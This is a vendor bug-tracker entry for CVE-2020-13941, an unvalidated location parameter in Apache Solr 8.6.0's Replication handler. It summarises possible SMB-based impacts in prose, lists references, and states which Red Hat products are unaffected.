In Solr version 8.6.0, the Replication handler allows commands backup, restore and deleteBackup that takeunvalidated alocation parameter, i.e you could read/write to any location the solr user can access. Launching SMB attacks which may result in the exfiltration of sensitive data such as OS user hashes (NTLM/LMhashes). In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution. Reference: https://www.openwall.com/lists/oss-security/2020/08/15/1
Created solr3 tracking bugs for this issue: Affects: fedora-31 [bug 1869168]
External References: https://www.openwall.com/lists/oss-security/2020/08/15/1 https://issues.apache.org/jira/browse/SOLR-14561 https://lucene.apache.org/solr/guide/8_6/index-replication.html#http-api-commands-for-the-replicationhandler https://github.com/apache/lucene-solr/commit/936b9d770e769c9018a9f408d576f52e7c4e8be2
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2020-13941
Statement: Red Hat JBoss Fuse 6, Red Hat Fuse 7, and Red Hat Integration Camel K using camel-solr are not directly affected by this vulnerability as the camel-solr component uses the client library solr-j and the vulnerability lies in the solr server itself. We advise customers using solr to investigate the usage of the server and ensure it is safe.